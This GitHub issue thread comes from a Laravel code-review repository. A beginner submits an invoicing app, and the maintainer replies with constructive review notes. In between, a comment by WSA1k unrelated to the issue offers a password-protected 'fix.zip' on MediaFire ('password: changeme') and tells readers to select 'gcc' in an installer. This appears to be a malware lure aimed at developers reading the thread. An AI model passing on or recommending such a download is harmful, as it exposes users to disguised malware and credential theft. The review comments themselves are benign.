### ISSUE TITLE
Invoicing App (MVP)

### ISSUE THREAD

**Issue by zaxwebs** [OussamaMater/Laravel-Code-Reviews#1]
## Code Submission

**Repository URL or Code Snippet Link**
https://github.com/zaxwebs/invoicer

## Code Description
I'm picking up Laravel and building a simple invoicing application for myself.

## Specific Areas for Feedback (Optional)

- Calculations on invoice generation
- InvoiceController, service, etc.
- Factories & seeding in general - images (yet to figure out)

## Additional Information  (Optional)
Ignoring authorization as of yet.

**Comment by WSA1k** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by OussamaMater** [comment]
Hey Zack, really cool repository! Your code is super clean 🙌

I have a dropped a review, you can see the notes [here](https://github.com/zaxwebs/invoicer/pull/1/files). Most of them are comments in the code. To sum it up:
- Use modern PHP features like arrow functions, null safety checks, etc.
- Write more tests. This will help you identify when code isn’t testable and needs refactoring.
- Use types consistently. I noticed that sometimes you use types, but sometimes you don’t. Types can help catch a lot of errors, especially if you use tools like phpstan. They also improve autocompletion. I recommend checking out tools like phpstan and laravel ide helpers.
- If you have a lot of scopes, consider using custom query builders  (personal preference). You will get autocompletion and they are not bloating your model.

You’ll notice that there are some files I didn’t review because I provided similar feedback on a different file, so you’ll catch it elsewhere.

Thanks for submitting your code for review, I really appreciate it! Let me know if any of my comments don't make sense or if you need more help with something.
